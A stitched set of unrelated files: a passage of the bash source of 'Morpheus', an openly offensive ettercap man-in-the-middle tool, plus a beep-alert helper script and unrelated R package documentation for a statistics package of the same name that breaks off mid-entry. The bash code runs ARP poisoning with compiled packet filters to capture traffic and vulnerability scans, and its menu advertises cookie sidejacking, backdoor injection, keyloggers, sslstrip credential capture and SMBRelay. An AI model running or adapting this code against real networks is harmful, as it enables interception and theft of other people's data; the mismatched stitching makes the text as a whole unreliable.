echo -e ""
sleep 2

# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "HTTP tcp Header Information Gathering\nExecute this module?" --width 300) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
sleep 1
cp $IPATH/filters/IG.eft $IPATH/filters/IG.bak > /dev/null 2>&1
rhost=$(zenity --title="☠ DEVICE TO FILTER ☠" --text "example: $IP\nchose remote target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
# write taget ip addr in ip.mop so IG.sh can use it ..
echo -e "target:$rhost" > $IPATH/output/ip.mop
#
# chose the type of capture
#
Tc=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Chose the type of capture" --radiolist --column "Pick" --column "Option" TRUE "capture only ip source packets" FALSE "capture source and destination packets" --width 350 --height 190) > /dev/null 2>&1
if [ "$Tc" = "capture only ip source packets" ]; then
  FCT="if (ip.src == '$rhost') {"
elif [ "$Tc" = "capture source and destination packets" ]; then
  FCT="if (ip.src == '$rhost' || ip.dst == '$rhost') {"
else
  echo -e ${RedF}[x] ${white}Please chose one ${RedF}capture Type${white} before Continue ..${Reset};
  # clean all stuff up ..
  sleep 2 && rm -f $IPATH/output/ip.mop > /dev/null 2>&1
  mv $IPATH/filters/IG.bak $IPATH/filters/IG.eft > /dev/null 2>&1
  exit
fi


  cd $IPATH/filters
  # replace values in template.filter with sed bash command
  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sed -i "s|TaRgEt|$rhost|g" IG.eft
  sed -i "s/RepLaCe/$FCT/" IG.eft
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/IG.eft"
  sleep 1

    # compiling firewall.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling IG.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/IG.eft -o $IPATH/output/IG.ef && sleep 3"
    sleep 1
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - http tcp header information gathering" -geometry 109x27 -e "cd $IPATH/bin && ./IG.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/IG.ef -M ARP /// ///
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - http tcp header information gathering" -geometry 109x27 -e "cd $IPATH/bin && ./IG.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/IG.ef -L $IPATH/logs/IG.log -M ARP /// ///
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - http tcp header information gathering" -geometry 109x27 -e "cd $IPATH/bin && ./IG.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/IG.ef -M ARP // //
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - http tcp header information gathering" -geometry 109x27 -e "cd $IPATH/bin && ./IG.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/IG.ef -L $IPATH/logs/IG.log -M ARP // //
        fi
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  sleep 2
  mv $IPATH/filters/IG.bak $IPATH/filters/IG.eft > /dev/null 2>&1
  rm $IPATH/output/ip.mop > /dev/null 2>&1
  rm $IPATH/output/IG.ef > /dev/null 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}



# ------------------------------------------------
# NMAP FUNTION TO REPORT LIVE TARGETS IN LOCAL LAN
# ------------------------------------------------
sh_stageS () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    Available nmap pre-defined scans:                             ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    1º - Normal   -  nmap ip discovery                            ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    2º - Stealth  -  nmap syn/ack + OS detection                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    3º - NSE      -  nmap service detection + nse-vuln categorie  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    4º - Target   -  nmap sealth + nse-vuln categorie             ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 320) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


#
# Fake User_Agent funtion
#
if [ "$IPH_UA" = "YES" ]; then
    echo -e ${BlueF}[☠] Please wait, Replacing http.lua nmap lib ..${Reset};
    sleep 2
      # check if we are in the rigth path
      if [ -e $LUA_PATH/nselib/http.lua ]; then
        cp $LUA_PATH/nselib/http.lua $IPATH/output/http.lua > /dev/null 2>&1
        cp $IPATH/bin/http.lua $LUA_PATH/nselib/http.lua > /dev/null 2>&1
        nmap --script-updatedb > /dev/null 2>&1
      else
        echo -e ${RedF}[x]${white} http.lua NOT found under sellected path ..${Reset};
        echo -e ${RedF}[x]${white} edit [ settings ] and config [ LIB_PATH= ] ${Reset};
        sleep 1
        exit
      fi
fi

  echo -e ${BlueF}[☠]${white} Scanning Local Lan${RedF}! ${Reset};
  # grab ip range + scan with nmap + zenity display results
  IP_RANGE=`ip route | grep "kernel" | awk {'print $1'}`
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Ip Range${RedF}:${GreenF}$IP_RANGE ${Reset};

  #
  # agressive scan using nmap -sS -O (OS) pentesting tutorials idea ..
  #
  Tc=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Chose the type of scan required\nRemmenber that 'stealth scans' takes longer to complete .." --radiolist --column "Pick" --column "Option" TRUE "Normal" FALSE "Stealth" FALSE "NSE" FALSE "Target" --width 300 --height 250) > /dev/null 2>&1


  #
  # scan local lan using nmap
  #
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Scan sellected${RedF}:${GreenF}$Tc ${Reset};
  dtr=`date | awk {'print $4'}`
  sleep 1
  #
  # Fake User_Agent funtion
  #
  if [ "$IPH_UA" = "YES" ]; then
    echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Faking User_Agent${RedF}:${GreenF}IPhone${Reset};
  fi


  if [ "$Tc" = "Normal" ]; then
    nmap -sn $IP_RANGE -oN $IPATH/logs/lan.mop | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="[ $dtr ] Scanning local lan [ Normal ].." --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    # strip results and print report
    cat $IPATH/logs/lan.mop | grep "for" | awk {'print $3,$5,$6'} | zenity --title "☠ LOCAL LAN REPORT ☠" --text-info --width 480 --height 390 > /dev/null 2>&1

  elif [ "$Tc" = "Stealth" ]; then
    nmap -sS $IP_RANGE -O -oN $IPATH/logs/lan.mop | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="[ $dtr ] Scanning local lan [ Stealth ] .." --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    # strip results and print report
    cat $IPATH/logs/lan.mop | grep -v "#" | grep -v "CPE:"| grep -v "type:" | grep -v "Distance:" | grep -v "closed" | grep -v "Too" | grep -v "No" | grep -v "latency" | grep -v "incorrect" | zenity --title "☠ LOCAL LAN REPORT ☠" --text-info --width 570 --height 470 > /dev/null 2>&1

  elif [ "$Tc" = "NSE" ]; then
    nmap -sV -T4 -Pn -oN $IPATH/logs/lan.mop --script vuln $IP_RANGE | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="[ $dtr ] Scanning local lan [ NSE ] .." --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    # strip results and print report
    cat $IPATH/logs/lan.mop | grep -v "Not" | zenity --title "☠ LOCAL LAN REPORT ☠" --text-info --width 590 --height 470 > /dev/null 2>&1

  else

    target=$(zenity --title="☠ Enter  RHOST ☠" --text "example: $IP" --entry --width 270) > /dev/null 2>&1
    nmap -sS -Pn --reason --data-length 25 -oN $IPATH/logs/lan.mop --script vuln $target | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="[ $dtr ] Scanning: $target [ NSE ] .." --percentage=0 --auto-close --width 320 > /dev/null 2>&1
    # strip results and print report
    cat $IPATH/logs/lan.mop | grep -v "Not" | zenity --title "☠ LOCAL LAN REPORT ☠" --text-info --width 590 --height 470 > /dev/null 2>&1
  fi


    # cleanup
    echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
    rm $IPATH/logs/lan.mop > /dev/null 2>&1
    sleep 2
    if [ "$IPH_UA" = "YES" ]; then
      echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Reverting nmap http.lua lib ..${Reset};
      sleep 2
      mv $IPATH/output/http.lua $LUA_PATH/nselib/http.lua > /dev/null 2>&1
      nmap --script-updatedb > /dev/null 2>&1
    fi


else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}




# -------------------------
# FUNTION TO EXIT FRAMEWORK
# -------------------------
sh_exit () {
echo -e ${BlueF}[☠]${white} Exit morpheus framework...${Reset};
sleep 1
echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Revert ettercap etter.conf ${Reset};
mv /tmp/etter.conf $Econ > /dev/null 2>&1
sleep 1
echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Revert ettercap etter.dns ${Reset};
mv /tmp/etter.dns $Edns > /dev/null 2>&1
sleep 1
mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
rm $ApachE/index.html > /dev/null 2>&1
sleep 2
clear
echo -e ${RedF}codename${white}::${RedF}oneiroi_phobetor'(The mithologic dream greek god)'${Reset};
echo -e ${RedF}Morpheus${white}©::${RedF}v$V3R${white}::${RedF}SuspiciousShellActivity${white}©::${RedF}RedTeam${white}::${RedF}2018  ${Reset};
exit
}



sh_main () {
echo -e "nothing" > /dev/null 2>&1
}


Colors;
# -----------------------------
# MAIN MENU SHELLCODE GENERATOR
# -----------------------------
# Loop forever
while :
do
clear
echo -e "" && echo -e "${BlueF}                 ☆ 𝓪𝓾𝓽𝓸𝓶𝓪𝓽𝓮𝓭 𝓮𝓽𝓽𝓮𝓻𝓬𝓪𝓹 𝓽𝓬𝓹/𝓲𝓹 𝓱𝓲𝓳𝓪𝓬𝓴𝓲𝓷𝓰 𝓽𝓸𝓸𝓵 ☆${BlueF}"
cat << !
    ███╗   ███╗ ██████╗ ██████╗ ██████╗ ██╗  ██╗███████╗██╗   ██╗███████╗
    ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██║  ██║██╔════╝██║   ██║██╔════╝
    ██╔████╔██║██║   ██║██████╔╝██████╔╝███████║█████╗  ██║   ██║███████╗
    ██║╚██╔╝██║██║   ██║██╔══██╗██╔═══╝ ██╔══██║██╔══╝  ██║   ██║╚════██║
    ██║ ╚═╝ ██║╚██████╔╝██║  ██║██║     ██║  ██║███████╗╚██████╔╝███████║
    ╚═╝     ╚═╝ ╚═════╝ ╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚══════╝
!
sleep 1
echo -e ${BlueF}"    VERSION:${YellowF}$V3R${BlueF} DISTRO:${YellowF}$DiStR0${BlueF} IP:${YellowF}$IP${BlueF} INTERFACE:${YellowF}$InT3R${BlueF} IPv6:${YellowF}$IpV"${BlueF}
cat << !
    ╔───────────────────────────────────────────────────────────────────╗
    |   1    -  Firewall filter  (tcp/udp)      -  report/capture_creds |
    |   2    -  Capture cookies  (http/auth)    -  sidejacking attack   |
    |   3    -  Drop all packets (src/dst)      -  packets drop/kill    |
    |   4    -  Redirect browser traffic        -  to another domain    |
    |   5    -  Redirect browser traffic        -  to google sphere     |
    |   6    -  Sniff browser traffic (http)    -  visited url's        |
    |   7    -  Sniff browser traffic (http)    -  capture pictures     |
    |   8    -  Sniff chat messages   (live)    -  AOL,IRC,YAHOO,MSN    |
    |   9    -  Inject backdoor into (</body>)  -  exe,bat,jar,ps1,dll  |
    |  10    -  Firefox browser heap-spray      -  buffer overflow      |
    |  11    -  Android browser heap-spray      -  buffer overflow      |
    |  12    -  Tor-browser heap-spray(windows) -  buffer overflow      |
    |  13    -  Clone website + keylooger       -  javascritp_keylooger |
    |  14    -  Modem/router login webpage      -  javascritp_keylooger |
    |  15    -  Replace website images          -  img src=http://other |
    |  16    -  Replace website text            -  replace: worlds      |
    |  17    -  Devices DHCP discovery          -  devices modem auth   |
    |  18    -  Block cpu crypto-minning        -  drop/kill packets    |
    |  19    -  Redirect browser traffic        -  to google pranks     |
    |  20    -  Capture https credentials       -  sslstrip+dns2proxy   |
    |  21    -  SMBrelay lateral movement       -  C&C SMBRelay exploit |
    |  22    -  tcp header information gather   -  capture http headers |
    |                                                                   |
    |   W    -  Write your own filter                                   |
    |   S    -  Scan LAN for live hosts                                 |
    |   E    -  Exit/close Morpheus                                     |
    ╚───────────────────────────────────────────────────────────────────╣
!
echo -e "${YellowF}                                                       SSA_${RedF}RedTeam${YellowF}©2018${BlueF}_⌋${Reset}"
echo -e ${BlueF}[☠]${white} tcp/udp hijacking tool${RedF}! ${Reset};
sleep 0.8
echo -e ${BlueF}[▶]${white} Chose Your Option[filter]${RedF}: ${Reset};
echo -e -n "$PrompT"
read choice
case $choice in
1) sh_stage1 ;;
2) sh_stage2 ;;
3) sh_stage3 ;;
4) sh_stage4 ;;
5) sh_stage5 ;;
6) sh_stage6 ;;
7) sh_stage7 ;;
8) sh_stage8 ;;
9) sh_stage9 ;;
10) sh_stage10 ;;
11) sh_stage11 ;;
12) sh_stage12 ;;
13) sh_stage13 ;;
14) sh_stage14 ;;
15) sh_stage15 ;;
16) sh_stage16 ;;
17) sh_stage17 ;;
18) sh_stage18 ;;
19) sh_stage19 ;;
20) sh_stage20 ;;
21) sh_stage21 ;;
22) sh_stage22 ;;
W) sh_stageW ;;
w) sh_stageW ;;
S) sh_stageS ;;
s) sh_stageS ;;
e) sh_exit ;;
E) sh_exit ;;
*) echo -e "\"$choice\": is not a valid Option"; sleep 1.3 ;;
esac
done

#!/bin/sh
##
# This scipt will sound a BEEP if the 'event' its found ..
# The objective of this script its to assist morpheus tool to
# sound warnings (beep sound) everytime the event its trigged.
# HOW? ettercap -blabla -bla & ./warn.sh
#
# DESCRIPTION:
# In this case the 'event' will be the creation of ettercap output:
# 'beep-warning.beep' logfile, that this script its looking for to emitt
# one sound warning to users (BEEP). It also deletes the logfile to allow
# the loop funtion to trigger another warning if the event its trigger again ..
##




# store info into local vars for later use
IPATH=`pwd`
interface=`netstat -r | grep "default" | awk {'print $8'}`
modem=`route -n | grep "UG" | awk {'print $2'} | tr -d '\n'`
#
# sellect warn.sh alert sound to use ..
#
if [ -e warn.ogg ]; then
  sound="warn.ogg"
  found="ogg"
else
  sound="printf '\a'"
  found="sys"
fi


#
# parsing data
#
cd .. && cd logs
if [ -e parse ]; then
rhost=`cat parse`
echo "" > $rhost.log
rm -f parse > /dev/nul 2>&1
else
external="YES"
echo "" > warn.log
fi
if [ -e triggertwo ]; then
secund=`cat triggertwo`
echo "" > $secund.log
rm -f triggertwo > /dev/nul 2>&1
fi
hour=`date | awk {'print $4,$5,$6'}`
clear


#
# bash trap (ctrl+c) abort execution
#
trap ctrl_c INT
ctrl_c() {
  echo ""
  echo "[Morpheus] Abort module execution .."
  sleep 2
exit
}



#
# first terminal message
#
if [ "$external" = "YES" ]; then
  echo "[Morpheus] Loging TCP/UDP Events .."
  echo "   * Interface : $interface"
  echo "   * Modem Ip  : $modem"
  echo "   * Hour/Date : $hour"
  echo "   * ---"
  echo ""
else
  echo "[Morpheus] Loging Events in: 67/UDP(dst) .."
  echo "   * Interface : $interface"
  echo "   * Modem Ip  : $modem"
  echo "   * Hour/Date : $hour"
    if [ -e $secund.log ]; then
      echo "   *   status  : Filtering two targets at once [!]"
      echo "   * Device    : $rhost.lan"
      echo "   * Device    : $secund.lan"
    else
      echo "   * Device    : $rhost.lan"
    fi
  echo "   * ---"
  echo ""
fi



#
# Bash Loop funtion ..
# BEEP IF found 'beep-warning.beep'
#
while :
do
#
# sleep time in loop funtion ..
# increase time in old pc's to consume less resources ..
# HINT: this value sets loop and sound warning delay time ..
#
sleep 1.5

  # check for .beep file existence
  if [ -e beep-warning.beep ]; then
    # store date to dislay at event trigger
    hour=`date | awk {'print $4,$5,$6'}`
    echo "   ✔ Event trigger at: $hour .."
    #
    # emitt one warning sound (BEEP)
    #
    if [ "$found" = "ogg" ]; then
      cd .. && cd bin && paplay $sound
      cd .. && cd logs
    else
      $sound
      sleep 0.3
    fi

    #
    # build logfile (in logs folder)
    #
    if [ -e parse.bin ]; then
      echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $rhost.log
      echo "   * Interface : $interface" >> $rhost.log
      echo "   * Modem Ip  : $modem" >> $rhost.log
      echo "   * Hour/Date : $hour" >> $rhost.log
      echo "   * Device    : $rhost.lan" >> $rhost.log
      echo "   * Action    : Request access to local LAN" >> $rhost.log
      echo "   * ---" >> $rhost.log
      echo "" >> $rhost.log
    fi

    if [ -e triggertwo.bin ]; then
      echo "[Morpheus] Loging Events in: 67/UDP(dst) .." >> $secund.log
      echo "   * Interface : $interface" >> $secund.log
      echo "   * Modem Ip  : $modem" >> $secund.log
      echo "   * Hour/Date : $hour" >> $secund.log
      echo "   * Device    : $secund.lan" >> $secund.log
      echo "   * Action    : Request access to local LAN" >> $secund.log
      echo "   * ---" >> $secund.log
      echo "" >> $secund.log
    fi

    if [ "$external" = "YES" ]; then
      echo "[Morpheus] Loging Events .." >> warn.log
      echo "   * Interface : $interface" >> warn.log
      echo "   * Modem Ip  : $modem" >> warn.log
      echo "   * Hour/Date : $hour" >> warn.log
      echo "   * ---" >> warn.log
      echo "" >> warn.log
    fi


      #
      # emmit more than one beep just to users to hear it proper ..
      #
      if [ "$found" = "sys" ]; then
        if [ -e beep-warning.beep ]; then
          for i in `seq 1 7`; do
            printf '\a'
            sleep 0.1
          done
        fi
      fi

    #
    # delete all files to emitt another sound if the event its trigger again in the future..
    #
    if [ -e beep-warning.beep ]; then
      rm -f beep-warning.beep > /dev/nul 2>&1
      rm -f triggertwo.bin > /dev/nul 2>&1
      rm -f parse.bin > /dev/nul 2>&1
    fi
  fi


# end of loop funtion
done


cd ..
# exit script execution
exit

\name{morpheus-package}
\alias{morpheus-package}
\alias{morpheus}
\docType{package}

\title{
	\packageTitle{morpheus}
}

\description{
	\packageDescription{morpheus}
}

\details{
	The package devtools should be useful in development stage, since we rely on testthat for
	unit tests, and roxygen2 for documentation. knitr is used to generate the package vignette.
	jointDiag allows to solve a joint diagonalization problem, providing a more robust
	solution compared to a single diagonalization.
	Concerning the other suggested packages:
	\itemize{
		\item{tensor is used for comparing to some reference functions initially coded in R;
			it should not be required in further package versions;}
		\item{parallel (generally) permits to run the bootstrap method faster.}
	}

	The two main functions are located in R/computeMu.R and R/optimParams.R:
	\itemize{
		\item{computeMu(): estimation of parameters directions;}
		\item{optimParams(): builds an object \code{o} to estimate all other parameters
			when calling \code{o$run()}, starting from the directions obtained by previous function}
	}
	See also \code{multiRun()}, which is a flexible method to run Monte-Carlo or bootstrap
	estimations using different models in various contexts.
}

\author{
	\packageAuthor{morpheus}

	Maintainer: \packageMaintainer{morpheus}
}

%\references{
%	TODO: Literature or other references for background information
%}

%\examples{
%	TODO: simple examples of the most important functions
%}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/optimParams.R
\name{optimParams}
\alias{optimParams}
\title{optimParams}
\usage{
optimParams(X, Y, K, link = c("logit", "probit"), M = NULL, nc = 0)
}
\arguments{
\item{X}{Data matrix of covariables}

\item{Y}{Output as a binary vector}

\item{K}{Number of populations.}

\item{link}{The link type, 'logit' or 'probit'.}

\item{M}{the empirical cross-moments between X and Y (optional)}

\item{nc}{Number of cores (default: 0 to use all)}
}
\value{
An object 'op' of class OptimParams, initialized so that
  \code{op$run(theta0)} outputs the list of optimized parameters
  \itemize{
    \item p: proportions, size K
    \item beta: regression matrix, size dxK
    \item b: intercepts, size K
  }
  theta0 is a list containing the initial parameters. Only beta is required
  (p would be set to (1/K,...,1/K) and b to (0,...0)).
}
\description{
Wrapper function for OptimParams class
}
\examples{
# Optimize parameters from estimated mu
io <- generateSampleIO(100,
  1/2, matrix(c(1,-2,3,1),ncol=2), c(0,0), "logit")
mu <- computeMu(io$X, io$Y, list(K=2))
o <- optimParams(io$X, io$Y, 2, "logit")
\donttest{
theta0 <- list(p=1/2, beta=mu, b=c(0,0))
par0 <- o$run(theta0)
# Compare with another starting point
theta1 <- list(p=1/2, beta=2*mu, b=c(0,0))
par1 <- o$run(theta1)
# Look at the function values at par0 and par1:
o$f( o$linArgs(par0) )
o$f( o$linArgs(par1) )}

}
\seealso{
\code{multiRun} to estimate statistics based on beta, and
  \code{generateSampleIO} for I/O random generation.
}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/sampleIO.R
\name{generateSampleIO}
\alias{generateSampleIO}
\title{Generate sample inputs-outputs}
\usage{
generateSampleIO(n, p, beta, b, link)
}
\arguments{
\item{n}{Number of individuals}

\item{p}{Vector of K(-1) populations relative proportions (sum (<)= 1)}

\item{beta}{Vectors of model parameters for each population, of size dxK}

\item{b}{Vector of intercept values (use rep(0,K) for no intercept)}

\item{link}{Link type; "logit" or "probit"}
}
\value{
A list with
\itemize{
  \item{X: the input matrix (size nxd)}
  \item{Y: the output vector (size n)}
  \item{index: the population index (in 1:K) for each row in X}
}
}
\description{
Generate input matrix X of size nxd and binary output of size n, where Y is subdivided
into K groups of proportions p. Inside one group, the probability law P(Y=1) is
described by the corresponding column parameter in the matrix beta + intercept b.
}
\examples{
# K = 3 so we give first two components of p: 0.3 and 0.3 (p[3] = 0.4)
io <- generateSampleIO(1000, c(.3,.3),
  matrix(c(1,3,-1,1,2,1),ncol=3), c(.5,-1,0), "logit")
io$index[1] #number of the group of X[1,] and Y[1] (in 1...K)

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.R
\name{plotCoefs}
\alias{plotCoefs}
\title{plotCoefs}
\usage{
plotCoefs(mr, params, ...)
}
\arguments{
\item{mr}{List of parameters matrices}

\item{params}{True value of the parameters matrix}

\item{...}{Additional graphical parameters}
}
\value{
No return value, called for side effects.
}
\description{
Draw a graph of (averaged) coefficients estimations with their standard,
deviations ordered by mean values.
Note that the drawing does not correspond to a function; it is just a
convenient way to visualize the estimated parameters.
}
\examples{
# mr[[i]] is a list of estimated parameters matrices (here random matrices).
# Should be mr <- multiRun(...) --> see bootstrap example in ?multiRun.
simmr_path <- system.file("extdata", "simulateMr.R", package = "morpheus")
source(simmr_path)
mr_theta <- simulateMr(c(3,2), 10)
mr <- mr_theta$mr ; theta <- mr_theta$theta
plotCoefs(mr[[1]], theta)

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/multiRun.R
\name{multiRun}
\alias{multiRun}
\title{multiRun}
\usage{
multiRun(
  fargs,
  estimParams,
  packages = c("morpheus"),
  prepareArgs = function(x, i) x,
  N = 10,
  ncores = 3,
  agg = lapply,
  verbose = FALSE
)
}
\arguments{
\item{fargs}{List of arguments for the estimation functions}

\item{estimParams}{List of nf function(s) to apply on fargs}

\item{packages}{Vector of packages to load on each node (default: morpheus)}

\item{prepareArgs}{Prepare arguments for the functions inside estimParams}

\item{N}{Number of runs}

\item{ncores}{Number of cores for parallel runs (<=1: sequential)}

\item{agg}{Aggregation method (default: lapply)}

\item{verbose}{TRUE to indicate runs + methods numbers}
}
\value{
A list of nf aggregates of N results (matrices).
}
\description{
Estimate N times some parameters, outputs of some list of functions.
This method is thus very generic, allowing typically bootstrap or
Monte-Carlo estimations of matrices mu or beta.
Passing a list of functions opens the possibility to compare them on a fair
basis (exact same inputs). It's even possible to compare methods on some
deterministic design of experiments.
}
\examples{
\donttest{
beta <- matrix(c(1,-2,3,1),ncol=2)

# This example requires a patch for the flexmix package written by Bettina Grün:
patch_path <- system.file("extdata", "FLXMRglm.R", package = "morpheus")
source(patch_path)

# Bootstrap + computeMu, morpheus VS flexmix
io <- generateSampleIO(n=1000, p=1/2, beta=beta, b=c(0,0), "logit")
mu <- normalize(beta)
res <- multiRun(list(X=io$X,Y=io$Y,K=2), list(
  # morpheus
  function(fargs) {
    ind <- fargs$ind
    computeMu(fargs$X[ind,], fargs$Y[ind], list(K=fargs$K))
  },
  # flexmix
  function(fargs) {
    ind <- fargs$ind
    K <- fargs$K
    dat <- as.data.frame( cbind(fargs$Y[ind],fargs$X[ind,]) )
    out <- refit( flexmix( cbind(V1, 1 - V1) ~ 0+., data=dat, k=K,
      model=FLXMRglm(family="binomial") ) )
    normalize( matrix(out@coef[1:(ncol(fargs$X)*K)], ncol=K) )
  } ),
  packages = c("morpheus", "flexmix"),
  prepareArgs = function(fargs,index) {
    if (index == 1)
      fargs$ind <- 1:nrow(fargs$X)
    else
      fargs$ind <- sample(1:nrow(fargs$X),replace=TRUE)
    fargs
  }, N=10, ncores=1) #ncores=3
for (i in 1:2)
  res[[i]] <- alignMatrices(res[[i]], ref=mu, ls_mode="exact")

# Monte-Carlo + optimParams from X,Y, morpheus VS flexmix
res <- multiRun(list(n=1000,p=1/2,beta=beta,b=c(0,0),link="logit"), list(
  # morpheus
  function(fargs) {
    K <- fargs$K
    mu <- computeMu(fargs$X, fargs$Y, list(K=fargs$K))
    o <- optimParams(fargs$X, fargs$Y, fargs$K, fargs$link, fargs$M)
    o$run(list(beta=mu))$beta
  },
  # flexmix
  function(fargs) {
    K <- fargs$K
    dat <- as.data.frame( cbind(fargs$Y,fargs$X) )
    out <- refit( flexmix( cbind(V1, 1 - V1) ~ ., data=dat, k=K,
      model=FLXMRglm(family="binomial") ) )
    sapply( seq_len(K), function(i)
      as.double( out@components[[1]][[i]][2:(1+ncol(fargs$X)),1] ) )
  } ),
  packages = c("morpheus", "flexmix"),
  prepareArgs = function(fargs,index) {
    library(morpheus)
    io <- generateSampleIO(fargs$n, fargs$p, fargs$beta, fargs$b, fargs$link)
    fargs$X <- io$X
    fargs$Y <- io$Y
    fargs$K <- ncol(fargs$beta)
    fargs$link <- fargs$link
    fargs$M <- computeMoments(io$X,io$Y)
    fargs
  }, N=10, ncores=1) #ncores=3
for (i in 1:2)
  res[[i]] <- alignMatrices(res[[i]], ref=beta, ls_mode="exact")}

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{normalize}
\alias{normalize}
\title{normalize}
\usage{
normalize(x)
}
\arguments{
\item{x}{Vector or matrix to be normalized}
}
\value{
The normalized matrix (1 column if x is a vector)
}
\description{
Normalize a vector or a matrix (by columns), using euclidian norm
}
\examples{
x <- matrix(c(1,2,-1,3), ncol=2)
normalize(x) #column 1 is 1/sqrt(5) (1 2),
             #and column 2 is 1/sqrt(10) (-1, 3)

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/plot.R
\name{plotBox}
\alias{plotBox}
\title{plotBox}
\usage{
plotBox(mr, x, y, ...)
}
\arguments{
\item{mr}{Output of multiRun(), list of lists of functions results}

\item{x}{Row index of the element inside the aggregated parameter}

\item{y}{Column index of the element inside the aggregated parameter}

\item{...}{Additional graphical parameters (xlab, ylab, ...)}
}
\value{
No return value, called for side effects.
}
\description{
Draw compared boxplots of a single parameter (scalar)
}
\examples{
# mr[[i]] is a list of estimated parameters matrices (here random matrices).
# Should be mr <- multiRun(...) --> see bootstrap example in ?multiRun.
simmr_path <- system.file("extdata", "simulateMr.R", package = "morpheus")
source(simmr_path)
source(simmr_path)
mr <- simulateMr(c(2,2), 10)$mr
plotBox(mr, 2, 1) #second row, first column

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/utils.R
\name{pvalue}
\alias{pvalue}
\title{pvalue}
\usage{
pvalue(mr)
}
\arguments{
\item{mr}{A list of matrices as output by multiRun()}
}
\value{
The matrix of p-values (same size as mr[[1]])
}
\description{
Compute the p-values of the tests beta[i,j] == 0 vs != 0
}
\examples{
# Next line should be a real call to multiRun()
mr <- list( list(matrix(c(1,2,3,4),ncol=2),matrix(c(2,2,1,1),ncol=2)) )
p <- pvalue(mr[[1]])

}

% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/computeMu.R
\name{computeMu}
\alias{computeMu}
\title{Compute mu}
\usage{
computeMu(X, Y, optargs = list())
}
\arguments{
\item{X}{Matrix of input data (size nxd)}

\item{Y}{Vector of binary outputs (size n)}

\item{optargs}{List of optional argument:
\itemize{
  \item 'jd_method', joint diagonalization method from the package jointDiag:
    'uwedge' (default) or 'jedi'.
  \item 'jd_nvects', number of random vectors for joint-diagonalization
    (or 0 for p=d, canonical basis by default)
  \item 'M', moments of order 1,2,3: will be computed if not provided.
  \item 'K', number of populations (estimated with rank of M2 if not given)
}}
}
\value{
